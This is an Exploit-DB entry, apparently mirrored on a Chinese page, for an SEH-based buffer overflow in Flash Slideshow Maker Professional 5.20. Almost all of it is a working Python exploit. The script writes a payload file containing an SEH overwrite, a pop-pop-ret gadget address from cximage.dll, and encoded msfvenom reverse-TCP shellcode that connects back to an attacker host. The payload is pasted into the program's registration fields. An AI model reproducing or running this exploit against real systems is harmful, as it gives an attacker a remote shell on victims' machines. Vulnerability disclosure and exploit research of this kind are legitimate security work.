Flash Slideshow Maker Professional 5.20 – Buffer Overflow (SEH)

  • 作者: Shubham Singh
    日期: 2018-09-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45355/
  • # Exploit Title: Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
    # Date: 2018-09-08
    # Author: Shubham Singh
    # Known As: Spirited Wolf [Twitter: @Pwsecspirit]
    # Software Link:http://flash.dvd-photo-slideshow.com/
    # Tested Version: 5.20
    # Tested on OS: Windows XP Service Pack 3 x86 
     
    # Steps to Reproduce:
    # 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
    # 2. Just copy the text inside "exploit.txt".
    # 3. Start the program. In the new window click "Help" > "Register ...
    # 4. Now paste the content of "exploit.txt" into the field:"Name" + "Code" > Click "Ok"
    # You will see a sweet reverse shell poped up in your attacker box.
    
    buffer = "A" * 1328
    # 0x1011063f : pop eax # pop esi # ret| ascii {PAGE_EXECUTE_READ}
    # [cximage.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.9.c
    # (C:\Program Files\Flash Slideshow Maker Professional\cximage.dll)
    nseh = "\xeb\x06\x90\x90"
    seh = "\x3f\x06\x11\x10"
    nops = "\x90" * 18
    # Badchar \x00\x0a\x0d
    # sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
    buf =""
    buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
    buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
    buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
    buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
    buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
    buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
    buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
    buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
    buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
    buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
    buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
    buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
    buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
    buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
    buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
    buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
    buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
    buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
    buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
    buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
    buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
    buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
    buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
    buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
    buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
    buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
    buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
    
    pad ="C" * (2300 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
    exploit = buffer + nseh + seh + nops + buf + pad
    try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
    except:
    print "File cannot be created"